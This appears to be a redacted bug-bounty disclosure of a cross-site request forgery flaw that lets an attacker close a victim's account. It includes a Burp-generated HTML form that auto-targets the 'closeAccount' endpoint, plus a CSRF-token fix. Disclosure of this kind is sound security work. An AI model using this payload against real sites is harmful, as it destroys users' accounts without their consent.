CSRF - Close Account

**Target Url** ████/services/user/closeAccount **Summary:** Hello, I found a Cross Site Request Forgery bug in the target endpoint on the POST request `/█████/services/user/closeAccount` which is critical because it can delete authenticated user account whenever he navigates to the attacker website or link. ## Step-by-step Reproduction Instructions 1. Navigate to your account █████████/#/login. 2. Copy and paste the below code in an html file ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="████████/services/user/closeAccount" method="POST"> <input type="submit" value="Submit request" /> </form> </body> </html>``` Open it in the browser, hit the button and your account will be closed. Please see the attached video for a clear poc. ████████ ## Suggested Mitigation/Remediation Actions Add a csrf-token in the header or in an hidden input to check if the user that is doing this action authorized or not. ## Impact This action is critical and sensitive. Attacker can upload this file to a url. Sends it to the victims. And when the authenticated victims navigate to the url their accounts will be deleted.